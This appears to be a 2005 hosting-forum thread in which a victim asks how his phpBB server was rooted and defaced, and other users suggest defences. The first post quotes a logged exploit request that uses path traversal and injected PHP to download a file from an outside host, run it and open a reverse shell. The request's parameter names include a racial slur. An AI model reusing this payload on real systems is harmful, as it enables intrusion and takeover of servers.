Results 1 to 6 of 6
  1. #1
    Join Date
    Jul 2000
    Location
    Washington, DC
    Posts
    591

    Anyone know what this remote root exploit does?

    I found the following in my access_log:

    202.84.223.166 - - [18/May/2005:17:48:07 -0400] "GET /admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d6510099c6293d5c50bcabefa76b6c46&niggaip=203.81.202.65&niggaport=6432&nigga=$a=fopen(\"http://www.pakhackers.com/pgc\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);system(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.0" 200 3941

    This is a remote code execution exploit. It took over the userid running the http server. From there, it somehow got into root and executed "find /home/ -name index.* -exec cp /home/index.php".

    Does anyone have information on this hack and everything it may have done to my system, especially what local root vulnerability it exploited?

  2. #2
    Yikes. Think I'll hard-code carriage returns for readability.

    Looks to me like it had php create a file in the /tmp folder and
    execute it. There' s much more than that, but it probably
    could've been prevented by having /tmp mounted as noexec.
    Also there is a relative path vulnerability on your server.
    That "../../../" etc. should've been booted by Apache.
    What version of Apache are you running? Check your
    distro's errata / security updates to see if there is a newer
    version available.

    (insert usual cleaning up after being broken into advice here)

    EDIT: I take back the relative path vulnerability thing.
    That's your PHP script that used that, not Apache. The
    script and/or PHP need to be hardened in addition to mounting
    /tmp as noexec.
    Last edited by BigMoneyJim; 05-18-2005 at 08:27 PM.

  3. #3
    it's a phpbb exploit... or realted to it at least

  4. #4
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    What kernel are you running, that would help track the exploit down a little. Also are you sure that root was gained? The using nobody to launch the scripts is fairly normal attack.

    That is just a run of the mill phpbb error, a hardened system with tweaked chmods on system files and a reasonable mod_security configuration could have prevented this.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  5. #5
    Join Date
    Jul 2000
    Location
    Washington, DC
    Posts
    591
    Yes, root was gained because I saw root executing the command "find /home/ -name index.* -exec cp /home/index.php" in ps, and it defaced all my index pages. They probably gained control of the web server user through phpBB and then from there used some local root exploit.

    My kernel is 2.4.20-18.7

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    That sure is an old kernel. I would get the os reloaded to a newer os such as centos 3.4 and then secure the server / php scripts running on the server.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •